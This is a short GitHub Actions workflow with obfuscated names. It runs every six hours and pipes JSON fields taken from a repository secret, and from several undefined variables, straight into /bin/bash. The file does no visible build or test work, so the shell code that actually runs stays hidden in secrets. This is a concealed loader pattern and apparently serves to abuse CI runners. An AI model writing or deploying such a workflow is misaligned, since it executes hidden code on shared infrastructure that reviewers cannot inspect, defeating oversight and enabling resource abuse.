name: yanshensu1986
on:
  workflow_dispatch:
  schedule:
    - cron: '39 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yanshensu1986
        env:
          neb8: ${{ secrets.neb8 }}
        run: |
          echo $neb8 | jq -r .eg6 | /bin/bash
          echo $smmoc05 | jq -r .yg7899 | /bin/bash
          echo $sdwt64050 | jq -r .typev4 | /bin/bash
          echo $y280 | jq -r .o8994 | /bin/bash
          echo $mrx206 | jq -r .a8242 | /bin/bash
          echo $ylbz040 | jq -r .aqwcg14 | /bin/bash
          echo $xm5389 | jq -r .s646 | /bin/bash

